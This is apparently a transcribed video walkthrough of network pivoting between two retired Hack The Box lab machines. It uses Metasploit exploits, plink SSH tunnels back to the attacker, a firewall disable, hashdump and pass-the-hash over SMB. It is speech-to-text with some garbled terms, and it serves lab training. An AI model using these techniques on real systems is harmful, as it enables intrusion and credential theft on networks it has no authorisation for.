What's going on, YouTube? This is IppSec, and we're going to be doing a update to the last video and getting this network pivoting actually working. Not 100% sure where all the issues came from. I think a lot of it came from me being a madman and saying, you know what, we're going to do network pivoting on a /24 network when you don't need to. And I think some of the things I implemented caused Metasploit to kind of act funky, but I've got it all figured out now, and we'll do the update. And why the last video had a lot of errors in it, because, well, it's nice to see other people struggling, even me. And also, I try to get the videos out as soon as a box is retired, and that is 4 hours before the launch, and I didn't have much time in the morning. I wait till the last possible minute to do recordings so I can try to incorporate what all the feedback is, and that may just be an excuse of me procrastinating. But enough talking, let's jump into the video. So before we begin, I'm going to create a new pane and we'll resize this. And this may make things a bit easier to explain if I have notes off to the side. So 10.10.14.4 is going to be us. That is our IP address. Granny, which is going to be the box we attacked from, is going to be 10.10.10.15. And Grandpa, the box we want to pivot to, is 10.10.10.14. So the first thing first is let's look at our IP table rules. We don't have anything, so we're going to block Grandpa. So -A to append to the output chain. The destination IP is going to be 10.10.10.14, and the rule we're going to jump to is going to be drop. And let's just set a ping to that to make sure a rule goes in effect. So as soon as we start this, we get operation not permitted on ping. So that's set. Now we actually have to do the exploitation. I'm not going to be explaining a lot of the exploits in depth because, well, they're done in the previous video. And I'm going to try to make this just about pivoting. So let's do the exploit, which is IIS WebDAV SC storage. This is a 2017 SVE. So show options. I'm going to set the R host to Granny, which is 10.10.10.15. And set lhost ton0. And I'm going to run this once. It's probably not going to go on my ton0 IP address. It's going to go on like a 192 if I had to guess. Oh no, it did right away that time. Sometimes you have to set lhost twice. It's shown in my last video. Don't know why that happens. But we got session 1 opened. So what we want to do is we're going to have to create a pivot from this box back to us. And when we do this, it's going to sound a bit confusing at first, but the main thing is -L is like a local port forward, and what that means is it's going to listen to this box and forward it to us. The -R flag, which is reverse, is going to listen on our box, go through, and forward it through the pivot machine. It's a bit backwards in my mind, but just keep that in mind as we do this video, and hopefully everything will make sense. So the firewall is on this box, so we have to escalate to admin. So I'm just going to do ms. Oh, I'm on Metropoder. Back in the session, ms15, show options, set session 1, and it did not go. So this is the error message I was expecting in the first video that we didn't see until the very end. And this just means we have to migrate to a different session, or a different process. So we're going to migrate to 1296. This is the session that our Metropoder is running, and we just want to be on a different session. Not exactly sure why this matters, but it does. So just learn to live with it. Whenever you see an error message right away and it couldn't possibly exploit that fast, chances are it's a weird issue, and try migrating to a different process. Don't know what else to say. So now we're running this, and this should get us a session any second. Come on. Not sure why this is taking so long. Let's try migrating to a different process. Migrate to 1712. Let's try this one. Our interpreter session's acting funky. We can't even get a shell. So migrating to this W3WP process actually screwed us over. So let's go back, do the SC storage exploit again. Get our session. And we'll migrate to 1712, the DAV data. Come on, session. Okay. Shell. Okay, we can still do that so our session isn't completely borked. MS15. Set session 2. Run this. And there we go. Now we have admin to the box. So what we can do, drop the shell, net sh firewall set op mode disable. So we had just now disabled the firewall. So if we try a port forward command, see what happens. Add -L. We're going to listen on 10.10, 10.15 because this is Granny. So we're listening on our own self. Then we're going to forward port 8000 to port 8000 on host 10.10.14.4. And this still doesn't work. So what we're trying to do is say whenever someone requests a connection on 10.10.15 port 8000, forward them to 10.10.14.4 on port 8000. That's what we're trying to do on this port forward command. It's not working. So what we're going to do, move away from Metasploit, and we're going to use plink. So you should have this on your Kali. User share Windows binaries plink.exe. This is part of PuTTY. So if you don't have this, if you Google it, you'll probably go to PuTTY's page and you can get it from there. So we're going to upload this, but first we need to probably be in a good directory. So cd/, I know we can write to inetpub and www-root. So that's where we're going to put our file. If we upload, then we can do /root documents grandparents plink.exe. We uploaded it. How plink works is it's going to, because it's part of PuTTY, going to establish a SSH tunnel back to us. And we don't want to do that tunnel over root, so what we're going to do is create a new user on a box. So user add IP, and I'm going to go into my etc passwd, and I'm going to say IP shell is bin false, because it doesn't need to actually execute commands. The other thing I'm going to do is change my password to be IppSec. Okay. So we have a user on a box, and we're going to restart SSH. So we should have SSH listening. Yes, we are listening on SSH. So plink is going to come back to us and create a tunnel. So let's go into shell. And we're going to do plink.exe, then -L, which is user. We're going to... Why did my shell die so quick? plink.exe -L -ip-pw for password. My password is IppSec. I'm going to do -l to do the local port. We're going to listen on 10.10.10.15, which is our own IP address. And we're going to listen on port 8000 on that. And we're going to forward all requests to 10.10.14.4 on port 8000. We're also going to specify -n, which tells this not to execute any commands once you establish the connection. So when we do this, we get an error message. Oh, I missed one thing. We have to specify the IP we want to SSH to establish the tunnel, which will be 10.10.14.4. This is the standard SSH key thing. Yes, we want to trust it. And that should be good. Background that channel. And let's do NC LVNP on 8000. So on our box, we're listening on any port on port 8000. We're going to NC to Granny, which is 10.10.10.15 on port 8000. And we get a connection. So we have verified our port forward there is working on everything. So we can background session 3. We're going to add a route. So route add 10.10.10.14, which is Grandpa. And we're going to say the subnet mask all 255s. So for any connection to this IP and this IP only, that's what the full subnet mask means, forward it through session 3. And now, when we do show options, we're going to set lhost to 10.10.10.15, which is Granny. Set lport to 8. Oh, wait, this is the privesc. My bad. Let's go to the SE storage. So, lhost, lport, show options, and we're going to have to set our host to Grandpa's. While we do this, we can capture it in Wireshark to prove we don't send any packets to 10.10.10.14. It's all going through 10.10.10.15. So ton 0. Now when we run this, let us hope everything works. And there we go. We get a shell on 10.10.10. Wait. Matopta's a bit freaked out. It doesn't exactly know what that IP address is because we're kind of tricking it doing this port forwarding magic outside of Metasploit. But once we get this, we can do shell ipconfig and see we're indeed on 10.10.10.14. And we go to Wireshark. We don't have anything from the source address of 10.10.10.14. It's all going through 10.10.10.15. So our port forwarding worked here. Now, let us do the reverse port so we can access Samba. Because the firewall is running on this box, and we shouldn't be able to access port 445 through a tunnel. So we're going to do a port forward on top of a port forward to access what's listening on 127.0.0.1.445. So let us do MS15 real quick to get a background session. MS15, show options. set session to 3, run this. Set session to 4. I think that's our session. Sessions I4 PS. Migrate to dav data, which is 1524. And I guess to authenticate, we can, what? Huh. Let's rerun this exploit. SC storage, exploit. Maybe some, oh no. I was thinking someone reset Granny on me and killed everything, which would really suck. What we're going to do is we're going to go admin, do hash dump to grab the NTLM hash, and pass the hash to open another shell to prove we have code execution on port 445. So let us background the session. Oh no, we want that session to migrate. PS, migrate 1524. Okay. We have migrated, so we can do MS15 now. Run. Set session 5. Okay. Run hash dump. When we get the administrator hash, and this time we're not going to bother cracking it. Even though we could, we're just going to save it off. So what we want to do is port forward -H. So let's try what we did in the last video. Port forward add -L 445 -P 445 -R localhost. So what we did is a reverse connect. So everything listening on Grandpa 445 is oh no. What we're doing is saying, trying to think how the best way to do this. So on port 445 on us, we are directing it to interpreter session 6 is this? And here we're saying that interpreter session 6 to 127.0.0.1.445. It's the easiest way to think about it. Not 100% factual, but that'll be the easiest way. So if we do nmap-p 445 localhost, it should come up as up. Yes. So background this session, we're going to search for SMB exec, and we're going to use the pass the hash version. And we can set SMB pass to be this. Aww. Gotta do this in 2 copies. That looks funky. Oh well. Set SMB user to be administrator. This isn't member of the domain. Set our host to be localhost. And we're going to see if this works. It's still trying to do a payload. So set lhost to be Granny's IP, which is 10.10.10.15. Set L port to be 8000 still. We run this. Did not work. I may have bit off more than I can chew here doing this tunnel as well. But that should have worked. Did it really not like localhost? Was that the issue? So let's see if this actually logs in. Go up. Where's hash dump? Administrator. Yeah, that should be fine. For good measure, we can just copy this and try it again. Set SMB. Let's see. SMB. PSExec. Pass the hash. SMB client. Let's see. Uh, 127.0.0.1 -u administrator. Yeah, that works. I don't know why Metasploit's not working. Something's weird there. But SMB client pass the hash did work. And I can press my paste. That's why I entered for the password that you didn't see. But we do see we're on Grandpa with SMB client. So I'm not 100% sure why the Metasploit module did not work, but obviously the port forward is set up if I went from localhost to Grandpa. So that'll be it for this Pass the Hash video. Or not Pass the Hash, network pivoting video. Hope you guys enjoyed it. Take care, and I'll see you next time.